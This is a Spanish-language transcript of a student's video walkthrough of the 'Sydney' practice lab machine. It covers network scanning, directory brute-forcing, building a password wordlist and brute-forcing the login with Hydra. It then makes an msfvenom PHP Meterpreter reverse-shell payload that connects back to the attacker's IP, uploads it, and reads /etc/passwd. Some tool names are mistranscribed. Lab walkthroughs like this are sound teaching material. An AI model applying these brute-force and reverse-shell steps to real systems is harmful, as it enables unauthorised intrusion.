Hola chicos, ¿cómo están? Bienvenidos a un nuevo video. Hoy les traigo una máquina, Sydney, que es de Bullhub, una máquina que nos pasó nuestro profesor de Hackinético para poder resolverla, que nos va a servir para estudiar, para la prueba que se nos viene. Eh, bueno, acá ya tengo las dos máquinas iniciadas, tanto Kali como Sydney, ambas en modo bridge en la tarjeta de red. Es importante que ambas estén en bridge, ¿ya? Tenemos las dos máquinas activadas. Tenemos nuestro Kali con nuestra consola. Lo primero que debemos hacer es averiguar en qué rango de red estamos trabajando. ¿Cómo lo hacemos? Con un ifconfig. Con el ifconfig nosotros vamos a averiguar cuál es nuestra IP dentro de la red, ¿cierto? Y en este caso la mía, la 100.52. Vamos a borrar esto. Ya, y la máscara de red es la 255.255.255.0, que es básicamente rango 24, que es una IP o un rango de red tipo C. Entonces, ya sabiendo en el rango que estamos, vamos a hacer un descubrimiento de host dentro de la red. Hay muchas formas de hacerlo, con Nmap, con rbscan, pero les recomiendo NetDiscover. Importante, sudo NetDiscover. ¿Por qué? Porque es un comando que se ejecuta a nivel de root, por ende necesita permiso root para ejecutarse. Por eso va con un sudo. Después el NetDiscover para invocar nuestro programa, un "-r" para especificarle que va a ser un rango de red, y le damos el rango de red. Le damos enter, nos va a pedir nuestras claves de root y está empezando a hacer el discover. Ya encontré algunos dispositivos que básicamente van a encontrar todos los dispositivos que tengo conectados a mi red. Y aquí hay un VMware, ¿cierto? Con una IP 151, que es la IP de nuestra máquina víctima, que es Sydney, ¿cierto? Ya conociendo la IP de nuestra máquina víctima, lo siguiente que vamos a hacer es un nmap -sb. ¿Por qué -sb? -sb es una opción que nos permite saber los puertos que están abiertos, nos permite saber los servicios que están corriendo en cada uno de esos puertos abiertos y la versión del servicio que corre. ¿Ya? Le vamos a dar enter, vamos a esperar un poquitito, que se demora unos segunditos en hacer el escáner, para averiguar los puertos que tienes abiertos en la máquina. Ya terminó. Podemos ver que escaneó 100 puertos, 99 estaban cerrados, perdón, 1000 puertos, 99 estaban cerrados, y había uno abierto, que es el puerto 80, con un servicio HTTP, o sea que es un servidor web, ¿cierto? Y está alojado en un Apache HTTPD 2.4.18, perdón. Acá tenemos la versión de servicio, aunque no la voy a ocupar mucho, pero igual es importante saber. Ya que sabemos que tiene un puerto 80, sabemos que hay una página web detrás. Por ende, vamos a abrir un navegador y vamos a ingresar la IP, ¿cierto? 192, que de hecho está ahí, para ver la página web que está alojada en el servidor Sydney. Aquí podemos ver alguna información, vemos una imagen. Es importante fijarse mucho en los detalles. De repente aquí podemos ver información relevante sobre cómo podemos resolver esta máquina. Dice, ¿hay alguien más atrás de ti? Se como llama o pregunta a Ben. Bueno, acá nos da un nombre. Dice que está seguro que él sabe cómo o sabe el login. Me imagino que los datos del login. Bueno, consejo. Lo primero que deben hacer, o una de las primeras cosas que deben hacer cuando están dentro de una página web, es averiguar o inspeccionar el código fuente de la página. Vamos a inspeccionarlo. Vemos aquí un poco de información, básicamente lo mismo que sea el título, el cuerpo, ok. Y aquí, bueno, acá hay una imagen, ¿cierto? Que nos dice un IMG, source, que es la ubicación, y acá nos da una ruta, ¿cierto? Bueno, ya sabemos que hay una ruta, que hay una carpeta que se llama Commodore 64 y que hay una imagen, entonces nosotros de hecho podemos revisarla. Y vamos a ver que acá es una imagen, simplemente. No se ve nada más. La misma imagen que está acá, ¿cierto? Y bueno, ya con esta información ya sabemos que hay una carpeta dentro que se llama Commodore 64. ¿Cómo podemos confirmar esto? Hay un programa que es de ataque de fuerza bruta que se llama DIRF. Bueno, hay muchos programas que se pueden hacer que sirven para hacer fuerza bruta a páginas web, que es para encontrar directorios y archivos ocultos o que no estén a la vista del usuario. Puede ser Dbuster, GoBuster, Fusing, bueno, hay varios. Pero nosotros vamos a ocupar DIRF, que es más sencillo de ocupar, ya que viene cargado con diccionarios predeterminados, ¿ya? Y le vamos a hacer un DIRF a la página web.
simplemente con el http la IP o la URL, también lo pueden hacer directamente a una URL, para averiguar si hay algún directorio o archivo oculto. Le damos enter y empieza a cargar en base a una lista, a un diccionario que está dentro de esta ruta, que el diccionario se llama common.txt, que de hecho si nosotros le hacemos un cat y hacemos esta ruta así, podemos ver acá el contenido de todo el diccionario, ¿cierto? Vamos a hacer el dir de nuevo para que nos muestre las páginas web que encontró. Bueno, encontró 3. No encontró el directorio Commodore 64. ¿Es por qué? ¿Por qué no lo encuentra? Porque dentro del diccionario no está escrita la palabra Commodore 64. Por ende no la encuentra. Por eso es importante que dentro del diccionario estén las palabras clave o puedan ocupar diccionarios que ustedes tengan como una noción de las posibles carpetas que pueden tener. En este caso nos encontró un index HTML y un server status. Bueno, el server status está en código 403, eso quiere decir que no tenemos acceso o permiso de acceso. Si nosotros lo abrimos, podemos ver aquí que no, permiso denegado, ¿cierto? No tenemos permiso de acceso. Si abrimos la siguiente URL, el HTML, nos manda simplemente a la misma página, ok, y si abrimos la siguiente, nos manda a la misma página, no nos mandó mayor información, pero sabemos que hay una carpeta Commodore 64, ¿cierto? Y no la listó. La podemos hacer manualmente, simplemente agregando acá, vamos a limpiar la página, en el mismo dir, y le agregamos la carpeta, ¿cierto? Para que empiece a listar en base a esa dirección. Le damos enter y como podemos ver encontró muchas más cosas. Podemos aquí encontrar un directorio que se llama conf, un directorio que se llama docs, otro que se llama icons, bueno, y aquí más cosas. Acá nos encontró el index que habíamos encontrado anteriormente, el index HTML. Acá nos encontró otro index, un .http, otro directorio, bueno, varios directorios. Acá un archivo readme, ya, si dice readme, bueno, hay que verlo. ¿Qué nos dice? Bueno, acá hay un documento de texto, creo. Nos dice acá PHP-FM. El file manager o el archivo de manejo o de administrador está escrito en PHP. Ok, y si podemos ver que de hecho acá sale, nos mandó un index.http. Lo vamos a abrir y ya tenemos el login, perfecto. O sea, el file manager se encuentra en esta ruta, en index.php. Perfecto, tenemos usuario y contraseña, pero no tenemos ni usuario ni contraseña. ¿Cómo podemos entrar? Hay que tratar de averiguar posibles nombres. Vamos a ver si podemos encontrar algo por aquí. Cierto, nos mandó una ruta, si no se acuerdan, ¿cierto? Vamos a copiarla y vamos a ver qué es lo que está acá. Entonces especificamos acá / la ruta, ok, la imagen, pero a ver, vamos a ver si tenemos acceso directamente al directorio. Y es importante, si nosotros ponemos acá debería dar acceso al directorio, pero no, nos dio acceso a una página, otra página que dice acá no te irás o algo. ¿Acaso no te irás? Estoy intentando presionar play en tab en cassette o algo así, y tú, hermano, Mike, como que me estás molestando. No sale con mayor información. Como siempre, chiquillos, una página tienen que hacer una revisión de código fuente. Ya, acá podemos ver más información. Dice que agregado por Wright Bonhart. Ok, bueno, esto ya me da a entender que este es como el usuario administrador o que tiene permiso de administrador. Ya tenemos un usuario, un posible usuario. Y dice que la password es la C64 Sound Chip Low Course. O sea, que está diciendo que la password es el chip de sonido C64 en minúscula. Ok. Me dice que son 3 letras y 4 dígitos sin espacio. O sea, me está diciendo que la contraseña es el chip de sonido en minúscula con 3 letras y 4 dígitos sin espacio.
Ya, ok, ya nos está dando un usuario y una posible contraseña. Me dice que es el chip de sonido 64, ok, y vamos a ocupar una página, esta misma, vamos a buscar Commodore 64, vamos a averiguar qué es, ya que se ve en todas partes, hay que averiguar qué puede ser. Vamos acá a la wiki. Y dice, Commodore 64 es una computadora doméstica de 8 bits desarrollada por Commodore International, bla bla bla, en agosto, ok. Utiliza una unidad de cassette, me imagino que es tape que decía la, ok, disquetera. Pero me hablaba algo del chip de sonido. Buscar información de sonido. No, 128, 64. Sé que esto no se ve nada. Otros características varias. No, chip de sonido no veo por ninguna parte. Especificaciones técnicas. Ya. Aquí podemos ver el microprocesador, videos, sonido. De hecho, ahora tengo marcado. Acá está el spoiler. Ya, sonido. Acá nos está especificando, bueno, los componentes técnicos de Commodore 64, que es un computador antiguo. Y bueno, acá tenemos el chip del microprocesador, el chip de video y acá tenemos el chip de sonido. Y nos decía que el chip de sonido era la clave, la contraseña de el usuario Humber, creo que sea, no me acuerdo cómo se llama. Bueno, básicamente que la contraseña se componía de 3 letras y 4 números y que era el chip de sonido de la 64. En este caso es MOS. Ya tenemos las 3 letras. Y acá tenemos dos posibles combinaciones de 4 números, ¿cierto? Vamos a intentemos conectarnos con eso. Ok, vamos a poner el usuario que es Rob Hobart, que ya lo tengo acá. MOS y 6581, ok, 6581. Y no se conectó, ok, no es la contraseña. El otro es 8580, vamos a ver si es esa o no. MOS 8580 y tampoco es, ya. Pero ya tenemos más o menos la estructura definida, o sea, sabemos que son 3 letras, 4 números, que es la contraseña y ya tenemos el usuario. ¿Qué podemos hacer? Construir un diccionario para hacer un ataque de fuerza bruta para poder averiguar la contraseña. Ya sabemos que se compone por un MOS y 4 números, ¿cierto? Perfecto. Vamos a crear un diccionario, ya, vamos a ocupar. Hay varias herramientas que podemos ocupar para hacer un diccionario, pero en este caso vamos a ocupar Crunch, que es de hecho el programa que ocupó el Prof. Que de hecho lo tenemos acá. ¿Cómo funciona Crunch? Los primeros que vamos a indicarle nosotros van a ser la cantidad de caracteres que va a tener nuestra lista inicial y la cantidad de caracteres que va a tener al final. En este caso va a ser un 4 y 4. El propio lo ocupó de otra manera, pero yo voy a ocupar esta manera que encuentro que es mucho más sencillo. Ya, le especificamos que quiero que nuestra lista tenga 4 caracteres de inicio y 4 caracteres de final y que dentro de esos caracteres se ocupen los números del 0 al 9. ¿Ok? O sea, ¿qué significa esto? Que Crunch va a crear una lista con palabras o posibles contraseñas de 4 caracteres que van a contener números, o sea, va a generar todas las posibles combinaciones con esos números en una lista, ¿cierto? Y le voy a especificar con la opción "-o" que me escriba todo el output o todos los resultados de este escáner en un archivo que se va a llamar números. Pero antes, por una buena práctica, es recomendable que cuando trabajen en una máquina, creen una carpeta de trabajo para esa máquina específica, para que todos los archivos que ustedes vayan creando y descargando o quieran compartir para resolver esta máquina estén siempre ubicados en una sola ubicación. Es por una cuestión más que nada de orden, ¿ya? Entonces vamos a ocupar el mkdir y vamos a crear la carpeta Sydney, ¿ya? De hecho vamos a hacer otra cosa, vamos a irnos a otro directorio, vamos a ir a Documents, ¿ya? Y dentro de Documents vamos a crear la carpeta, de hecho creo que está vacía. No, ya está la carpeta Sydney creada, que de hecho es la que estuve trabajando en un principio. Pero vamos a crear otra carpeta de trabajo, ya, para que no nos confundamos. Vamos a, perdón, eso no sé, mkdir. Sí, vamos a escribirle Sydney 2, ¿ya? Para cambiar la carpeta. Entonces vamos a entrar a Sydney 2 con un cd, Sydney 2,
y estando adentro podemos ver que está la carpeta vacía, no hay nada, ¿ok? Ya, ahora sí vamos a ocupar Crunch para crear el diccionario como les expliqué. Entonces todo el output que genere lo va a guardar en la palabra números, o sea, en el archivo números. Si ahora hacemos un ls-l, podemos ver que creó un archivo que se llama números. Si le hacemos un cat a números, podemos ver que hay una lista con números y el último cifra termina en 999. ¿Cómo podemos ver todo el contenido? Porque claro, podemos ir revisando ahí hacia arriba hasta llegar hasta el inicio de la lista. Pero para poder optimizar más los tiempos podemos ocupar el comando head, ¿ya? Head lo que hace es mostrarnos los primeros 10 nombres o de la lista que están en el archivo que nosotros le especificamos. En este caso no es password, sino es números, ¿cierto? Números. Dentro de números, entonces los primeros números o la primera lista, los primeros 10 argumentos de la lista, eso es, argumentos, son estos, ¿cierto? 00, 001, 002, etcétera, etcétera. Y con el tile, comando tile, podemos ver los 10 últimos nombres de la lista, que en este caso son estos que están aquí, ¿cierto? Que termina en 999. O sea, sabemos que empieza en 000 y termina en 999. Perfecto. Tenemos todas las posibles combinaciones de 4 dígitos, ¿cierto? Desde el 1 al 9, desde el 0 al 9, perdón. Ahora, tenemos que crear, sabemos que la contraseña es MOS más los números. Entonces ahora vamos a crear un diccionario de contraseñas ya listo con el MOS. Hay muchas formas de hacerlo, el profe también lo creó directamente con Crunch, con otro tipo de opciones, pero yo voy a ocupar un poco de scripting en Batch, vamos a hacer un bucle, y con el bucle vamos a ir construyendo de a poquito el diccionario. ¿Cómo lo hacemos? Con un for, que de hecho se autocompleta acá, y le voy a explicar para qué sirve esto. For, esto no es un programa, sino es un scripting en Batch, ¿ya? Que lo que quiero es que sea un bucle para poder construir el diccionario. ¿Cómo funciona esto? Le estoy diciendo que mientras i, que va a ser una variable, dentro de la ejecución de este comando, que este es un cat, cuando ustedes especifican con un símbolo dólar, y dentro de ese símbolo de dólar, en entre paréntesis, agregan un comando, lo que hace es quedarse con el resultado de ese comando, ya, para generar una acción. ¿Qué acción quiero que genere? Mientras i valga el cat de números, quiero que me haga un eco, que un eco es el comando básicamente que refleja en consola lo que el output que uno escribe, ya, está diciendo que me mande un eco con la palabra MOS y que agregue después de MOS el valor de i, ya, el valor de i, que en este caso, mira, vamos a hacer una cosita antes de, para que me entiendan bien, vamos a hacer el mismo tile a números, ya, no, un head mejor, el head mejor. Ahí se el inicio de la lista. Entonces, con el bucle, lo que hace es que hace un bucle de un cat. El cat lee el primer argumento y ejecuta la acción que quiero que haga. Después de que ejecuta la acción, vuelve a hacer, como es un bucle, vuelve al segundo argumento y realiza la acción que yo le especifique. Por eso es el cat números. Entonces, el bucle va a ser un cat a cada uno de estos, ¿cierto? Cada uno de los números de la lista. Le va a escribir un MOS al principio y después del MOS va a agregar el valor de i, que por ejemplo en la primera vuelta el valor de i va a ser 000. Entonces con el eco va a escribir MOS y el valor de i en la primera vuelta va a ser 000, entonces va a escribir MOS 0000. Y quiero que ese output o el resultado de esa acción me las guarde con este símbolo en un archivo de nombre password o el nombre que ustedes le quieran dar, ahí eso da lo mismo. Aquí va el nombre del archivo en el cual yo quiero que guarde el output de cada uno de las vueltas que tiene el bucle, ¿ok? Y le agregamos un don para poder cerrar el bucle, ¿ya? El do es para iniciarlo, el don es para cerrarlo. Si no le escriben esto, no lo va a reconocer como un bucle, ¿ya? Entonces, en resumen, mientras i valga cat números, o sea, el argumento del primer cat que haga, ¿cierto? Quiero que hagas un eco, escribas MOS y después del MOS escribas el valor de i en esa vuelta, que en la primera va a ser 000, en la segunda va a ser 0001 y así sucesivamente. Y que todo el output que vaya generando me lo guarde en el archivo de nombre password. Le damos a enter y es súper rápido. Ahora si hacemos un ls-l, vamos a encontrar que hay dos archivos. El primero que creamos que da números y el segundo que se acaba de crear que es de password.
Si nosotros hacemos un head a password para ver los primeros 10 argumentos, podemos ver que los primeros argumentos son MOS 000 y así sucesivamente, ¿cierto? Y un tail a password, perdón, no, números a password. Y podemos ver los 10 últimos argumentos que terminan en MOS 999. O sea, ahora ya tenemos cubierto el rango total de las posibles contraseñas. Teniendo el diccionario, vamos a limpiar página. Teniendo el diccionario, ¿cómo podemos hacer el ataque de fuerza bruta? Una de las formas es ocupando el Hydra. Pero para ocupar Hydra necesitamos cierta información que podemos obtener tanto de Build Suite o, para mí, la forma más sencilla es por la inspección, para inspeccionar la página, ¿ya? Aquí todas las acciones que vayamos realizando se van a ir registrando aquí en el inspector, ¿cierto? Entonces nosotros vamos aquí a escribir cualquier cosa, ¿cierto? Una contraseña cualquiera, para generar la petición, para ver qué pasa por detrás. Entonces, ya como podemos ver, hubo movimiento acá. Entonces vamos a ir a la inspección de red. Dentro de la inspección de red podemos ver las peticiones y tenemos una petición post, que si ustedes recuerdan bien, en Wireshark vimos lo que eran las peticiones post para ver los archivos HTTP para encontrar las contraseñas, si se acuerdan bien, ¿ya? Entonces dentro de post nosotros vamos a la solicitud como tal y podemos ver la solicitud en texto claro, ¿cierto? De hecho podemos ver aquí el usuario y la contraseña que yo ingresé. Y acá podemos ver el nombre de la variable, ¿cierto? El nombre de la variable input username. O sea que el usuario, la página lo que hace es que el usuario lo guarda en la variable input username. Entonces nosotros ni tenemos que especificarle que input username es la variable donde tiene que guardar el usuario. Y input password es la variable donde tiene que guardar la password. Ya, con esos datos podemos nosotros construir la solicitud con Venom para poder hacer, con Hydra para poder hacer la petición, la solicitud para hacer el ataque de fuerza bruta. Entonces, vamos a Hydra, bueno, acá ya tengo un comando completo, les voy a ir explicando cada una de estas partes para que entiendan bien. Solamente que aquí hay una cosita que está de más. Lo voy a borrar, que ese está haciendo algunas pruebas. Eso no va. Perfecto. ¿Cómo se construye Hydra? Bueno, primero Hydra, que escribimos Hydra para poder llamar al programa. Le especificamos la IP víctima, ¿ya? A donde queremos dirigir el ataque, ¿ya? Después con un "-l, nosotros le indicamos el usuario. Hay dos formas de ocupar el "-l, tanto con mayúscula como minúscula. Cuando lo ocupamos en minúscula es porque nosotros les vamos a indicar a Hydra que nosotros conocemos el usuario. Entonces, con un "-l minúscula, después le escribimos el nombre del usuario que queremos nosotros intentar en el ataque de fuerza bruta, ¿ya? Si nosotros no supiéramos el usuario y tuviéramos una lista, un diccionario de posibles usuarios, nosotros deberíamos ocupar la opción "-l mayúscula y especificarle aquí el nombre del archivo, como pasa en el tema del password. Con el "-p nosotros le especificamos password y se ocupa exactamente igual que el anterior. Si es "-p minúscula, nosotros les vamos a especificar que sabemos la contraseña y se la tenemos que especificar acá. Como en este caso nosotros no la sabemos, vamos a ocupar la "-p mayúscula. ¿Qué es "-p mayúscula? Es que nosotros vamos a proporcionar un archivo con una lista de posibles contraseñas, ¿ya? Que es el que acabamos de crear anteriormente, que se llama password. Perfecto. El tipo de petición que vamos a hacer. Si ustedes se acuerdan en Wireshark, cuando nosotros íbamos a los paquetes que eran de tipo HTTP post, encontrábamos las contraseñas. Entonces, la petición que corre detrás cuando uno ingresa a usuario y contraseñas es una petición post HTTP. ¿Por qué form? Porque está llenando un formulario, ¿ya? Entonces, esta es la forma de especificarle a Hydra que nosotros vamos a hacer una petición post form de un formulario para ingresar usuario y contraseña, ¿ya? Lo siguiente que vamos a hacer es indicarle dónde va a ser ese ataque de fuerza bruta, ¿ya? Entonces, entre comillas, le vamos a especificar primero la ruta. ¿Dónde está esa ruta? Acá, ¿cierto? Ya le especificamos al principio la IP y ahora le tenemos que especificar la ruta donde está la página de logueo, que es Commodore 64/index.htp. Entonces nosotros vamos acá y como pueden ver está acá, ¿cierto? Después dos puntos para indicarle que acá termina la URL y acá empieza en los outputs o las variables donde tienen que guardar
el usuario y la contraseña. Ya sabemos que output username, como podemos ver acá, corresponde al usuario. Entonces le especificamos que en esta variable que se me complica, ya, ahí sí. Entonces, le especificamos que el input username es el user, ya así, con este término, con este gorrito que le dicen gorrito chino, entre gorritos chinos le ponemos user para especificarle que este variable es el usuario, así reconoce Hydra que es usuario. Y este símbolo que está acá, que es el aspersion, creo que se llama, que es el símbolo así que parece como una I, ¿cierto? Que el input password es igual a la pass, ¿ya? Y si podemos ver acá, el input password es la variable donde guarda el password. Entonces le especificamos que en esa variable está guardada la pass. Ahora, le damos 2 puntos más para especificarle ahora dónde está ubicado el formulario donde tienen que ingresar los. Ya sabemos que está ingresado en esta dirección IP, pero en qué parte de la página está. Entonces nosotros le tenemos que dar algún tipo de referencia. ¿Por qué login system? Porque acá el nombre de la ventana donde se ingresa el usuario y la contraseña se llama login system. Entonces nosotros ahí ya le especificamos que en el nombre de esta ventanita, o donde dice, en la parte de la página donde dice login system, está ubicada la sección donde se ingresa el usuario y contraseña, ¿ya? Ahora, le vamos a agregar 2 opciones más. El "-t", que es básicamente la cantidad de hilos que va a ocupar Hydra para poder ingresar la contraseña. ¿Qué quiere decir esto? Si le especifico que son 10 hilos, va a ser, por cada intento, va a ser 10 intentos con 10 contraseñas distintas. O sea, va a ir de 10 en 10, ¿ya? Va a ser 10 intentos, después 10 intentos, después 10 intentos, 10 intentos. Va a ir así. Y le vamos a aplicar el "-b" mayúscula, que es un verbose. El verbose lo que hace es mostrarnos en consola todo el proceso que va generando el programa. Porque si nosotros lo ejecutamos sin el "-verbose, le van a dar enter y va a quedar como colgado. Pero en realidad por detrás se está haciendo los intentos. Entonces, para nosotros asegurarnos que el programa está funcionando y que está corriendo, le aplicamos un "-b" para el verbose y para que en pantalla, en consola, nos muestre todo el proceso que va generando. Ya con todo esto le damos enter. Y como pueden ver acá ya está intentando loguearse con el login de Rainbow, ¿cierto? Que está acá. Y está intentando cada una de los passwords, uno por uno, ¿cierto? Van en el 0400, 0500 y así sucesivamente. Y cuando encuentre una coincidencia, el programa se va a detener y nos va a dar las credenciales de acceso, ¿ok? Esto se demora un poquito, así que mientras trabaja, vamos a cerrar acá. Y ya estando dentro de la máquina, podemos ver las opciones que nosotros podemos tener para poder conectarnos a la máquina, poder quizá hacer una reverse shell para poder tener acceso a la máquina desde nuestra consola. Y la idea es elevar privilegio y conseguir la flag, que de hecho esa parte no la mostró el profe. ¿Ya? Así que vamos a esperar un poquito. De hecho voy a detener un poquito el video, yo creo, por cosa del tiempo. Cuando esté listo vamos a retomar. Ya, chicos, por fin ha encontrado Hydra la contraseña. Como podemos ver acá, después de todos los intentos, intentando una por una cada una de las contraseñas, encontró una coincidencia. En la solicitud HTTP post form, ¿cierto? Podemos ver que a través del host tanto, que es la IP de nuestra víctima, encontró que el login era RobHubBart, ¿cierto? Y el password es mos6518. Perfecto, ya con esta información vamos a... Bueno, aquí estoy logueado, pero estaba haciendo unas pruebas. Loguearme, ¿cierto? A ustedes les va a aparecer así. Le ponen mos6518 y están dentro. Estando dentro ya podemos ver aquí la interfaz del panel de control del administrador. Podemos ver que podemos revisar las carpetas, ver el contenido, perfecto. Tenemos la opción de crear archivos, de subir archivos. Y ya estas 2 opciones nos permiten 2 formas distintas para poder ingresar al sistema, ya que el siguiente paso que tenemos que hacer es poder, de alguna manera, ejecutar código remoto para poder acceder al sistema. Y ojalá hacer una reverse shell para poder acceder al sistema de nuestra víctima a través de nuestra consola en nuestro computador de atacante. Perfecto. Entendiendo eso, les voy a explicar las 2 formas. Una, que es la subiendo archivo, que es la que explicó el profesor en clase, que ocupó MS-Venom para crear un malware y Metaxploit para poder acceder a la conexión. MS-Venom va a crear el virus para poder... que el virus lo que va a hacer es enviar una solicitud de conexión a nosotros, ¿ya? Entonces nosotros tenemos que subir ese archivo para que se ejecute en la máquina víctima y desde la máquina víctima nos llegue a nosotros una solicitud de conexión y así nosotros podemos tener acceso al sistema, ¿ya?
vamos a hacer eso ahora a continuación. Y la otra forma es creando un archivo, verificando si a Hole es vulnerable a alguna inyección de PHP, por ejemplo, o a PHP injection, perdón. Y si se ejecutan los comandos de esa manera, podemos también acceder al sistema ejecutando comandos a través de la página web y enviando una solicitud también de conexión hacia nosotros para poder establecer una conexión de forma remota. Primeramente les explicaré lo del profesor, y yo creo que en un segundo video aparte les explicaré lo segundo, porque si no se va a alargar demasiado el video, porque ya yo voy por la hora. Ya, entonces vamos a ir a la consola, vamos a limpiar aquí y vamos a escribir msvenom, msfvenom. Bueno, y aquí está el comando completo para crear el exploit y les voy a explicar cómo se construye, porque dice todo lo que dice, ¿cierto? Bueno, primero escribo un nombre del programa, msfvenom, y le especificamos con el "-p" el payload que vamos a ocupar. En este caso es un PHP Meterpreter Reverse TCP. Que este payload lo que hace es mandarnos una solicitud de conexión a nosotros. ¿Cómo especificamos a dónde manda esa conexión? Con el LPost, con el LHost y el LPort. El LHost es la IP de nosotros, es hacia donde quiero que la máquina víctima se conecte, o sea, hacia mí. Y el puerto es hacia a través de qué puerto haga esa conexión, ¿ya? Eso es importante que manejen esos datos. La IP, ya perfecto, es de la de nosotros, que si de hecho hago aquí un ifconfig, podemos ver que mi IP es la 152, que es la misma que sale acá. Y el puerto, bueno, el puerto puede ser cualquiera, se lo pueden especificar, puede ser el 4040, el 8080, el que ustedes se lo quieran dentro de los disponibles. Pero yo en este caso le especifico el 4242, puede ser cualquiera. Con el "-f" le especifico el formato en el cual yo quiero que se escriba el exploit, o el virus, perdón. En este caso el formato RAW. Y quiero que el output, o sea, la ejecución la creación de ese malware, lo guarde en un archivo que se llama exploit.php. ¿Ya? Ese va a ser la estructura del comando en msvenom. Si le damos enter, pero antes voy a irme a la carpeta de trabajo porque no estoy en la carpeta de trabajo, me acabo de fijar. Perdón, vamos a cd document, que es donde estamos trabajando, ¿cierto? Dentro de aquí tenemos Sydney 2 y dentro de aquí tenemos ls-l para ver el contenido. Perfecto, están los mismos archivos que nosotros habíamos dejado. Ahora sí, msvenom, que no está bueno, msfvenom. Ya, y como les expliqué todo, le hacemos enter y en este momento está creando el virus, ¿cierto? Ya teniéndolo creado, lo siguiente que tenemos que hacer es subirlo acá, a través de esta opción. Ya estando el archivo subido, nosotros hay una forma de ejecutarlo que se lo voy a mostrar. Por ejemplo, si quieren ejecutar un archivo o quieren revisar un archivo de los que están acá, simplemente copian el nombre y lo especifican después de Commodore 64, ya que esto es una ruta, son como directorios, carpeta. Lo mismo que cuando ustedes escriben una ruta en C, archivos de programa, etcétera, etcétera, es una ruta, ¿ya? Entonces aquí completamos la ruta y bueno, no abre el archivo. Ahora si quiero, por ejemplo, ver el siguiente imagen, que esto es una imagen, ¿cierto? Simplemente a continuación de Commodore 64 se lo pegamos y ya nos va a acceder a todos los archivos que tenemos acá. Por ende, nosotros subiéndolo acá, de la misma manera vamos a ejecutar ese virus, ¿ya? Bueno, acá ya lo he terminado de crear. Vamos a ver el ls-l, perdón, y vemos que está aquí el exploit. Ya teniéndolo esto, lo siguiente que vamos a hacer, como dijimos, es subirlo. Acá Sydney 2, ¿cierto? Exploit. Perfecto. Lo cargamos y lo subimos. Y podemos ver, acá está. Entonces, para ejecutarlo, simplemente escribimos el nombre del archivo acá, que es exploit.php. Ya, vamos a dejarlo ahí por mientras. Si le doy enter, se va a ejecutar y va a mandar una solicitud de conexión. Pero si yo no tengo un puerto, es el puerto 442 abierto, disponible para recibir esa conexión, no va a pasar nada. ¿Cómo podemos hacer eso? Fácil, vamos aquí, vamos a ocupar el comando, vamos a ocupar un programa que se llama Netcat. Netcat es un programa que nos permite establecer conexiones de forma remota, ¿ya? Se especifica un NC. Le especificamos las opciones para establecer una conexión remota para que se permanezca en escucha a través de ese puerto esperando una conexión. Con las opciones NBLP, ¿ya? Da lo mismo el orden, puede ser NLP o PNLP, da lo mismo, pero tienen que ser esas 4 letras, que son todas las 4 opciones que vamos a ocupar, y especificarle el puerto, que en este caso es el 4242. Acuérdense que tiene que ser exactamente el mismo puerto que ustedes le especificaron en el virus. Ustedes le dan enter y ya está en escucha.
Pero perdón. Este es el otro método. Perdón, es el otro método. ¿Verdad que estamos jugando MS Console? Claro, si yo lo ocupo así, si trato de hacer una conexión con Netcat, no me va a servir. ¿Por qué? Porque yo hice el virus con MS Console, que está hecho para hacer conexiones con MS Venom, que está hecho para hacer conexiones con MS Console, ¿ya? Con Metasploit. Por eso tenemos que ocupar Metasploit, porque ocupamos MS Venom para construir el malware, ¿ya? Perdón por ese detalle. Estaba intentando la otra opción, que después la vamos a ver, ¿ya? Ya. Olvídense lo que dijimos, ya. Subimos el archivo, abrimos Metasploit, ya, ese es el orden. Subimos el archivo ya podemos ver que está acá. Retomamos un poquito, ¿cierto? Exploit, está listo para ejecutarse. Ahora nos ponemos a escuchar con Metasploit. ¿Cómo lo hacemos? Control L para poder limpiar la consola. Y vamos a especificarle un exploit que es el exploit / multi. ¿Por qué multi? Porque es multiplataforma, ¿cierto? Y un headler, creo que era headlers, creo que era así. No era así. A ver, deme un segundito que lo busco. No, de repente se me olvidan mi torpedito. Voy a pausar esto mientras busco y lo retomamos cuando encuentre el comando. Handler, ok. Ya sé cuál es el primero. Escribí más mal el handler, perdón. Ahí sí, ya, perfecto. Perdón por ese pequeño impasse. Ya, estando dentro, ya seleccionando el exploit, lo siguiente que tenemos que ver son las options que tenemos que configurar. Perfecto, acá podemos ver que tenemos el payload, que es el generic shell reverse, que lo tenemos que cambiar porque tenemos que ocupar el mismo payload que nosotros ocupamos para Metasploit, que de hecho es este, que lo tengo aquí, Metasploit reverse shell. Vamos a cerrar esto que no tiene nada que ver. Ya, para no confundirme. Ya, estando acá, lo primero que vamos a hacer, vamos a cambiar el payload. ¿Cómo lo cambiamos? Con un set payload, ¿cierto? Payloads en singular, y le especificamos el mismo que ocupamos en el virus, que es el php /meterpreter /reverse tcp. Ya está cargado. Ahora lo siguiente que vamos a setear es el lhost. El lhost tiene que ser el mismo que nosotros especificamos en el virus, ¿cierto? Lhost, y especificamos nuestra IP, ¿cierto? 92.168.100.52. Y el LPort, importante porque acá está configurado con el 444 y nosotros le especificamos en el virus que era 4242. Por ende, tenemos que cambiarlo. ¿Cómo? Con el mismo comando set lport, port 4242. Perfecto. Volvemos a options y vamos a ver que está configurado correctamente tanto el lhost, el lport, el payload, y ya con eso listo, le damos a run o exploit. Ambos sirven. Y ya en este momento tenemos a Metasploit en escucha esperando la conexión a través del puerto 4242. Y si nosotros vamos acá y ejecutamos el exploit, podemos ver que se queda en espera, en escucha. Pero si volvemos acá, ya vemos que cambió, nos mandó dos mensajes más, que se envió el stage a la IP y Metasploit sesión 1 abierta. Perfecto, ya tenemos conexión. De hecho, si vamos a hacer un control L y hacemos un ls-l, -L, otra vez. Ahora sí, -L, ahí, ya, perfecto. Ya, y tenemos acá, por ejemplo, estamos listando todo el contenido de nuestra máquina víctima a través de nuestra consola. O sea que ya tenemos acceso remoto, ya tenemos una reverse shell. Ya, y pues de hecho podemos ver aquí el exploit, tiene que estar por aquí. Ahí está el exploit, que es el archivo que acabamos de subir, los archivos que hemos revisado, el readme que leímos, ¿cierto? Y de hecho podemos hacer aquí un cat a la carpeta etc, el archivo etc passwd, que básicamente es el archivo que contiene los archivos, los usuarios válidos dentro del sistema,
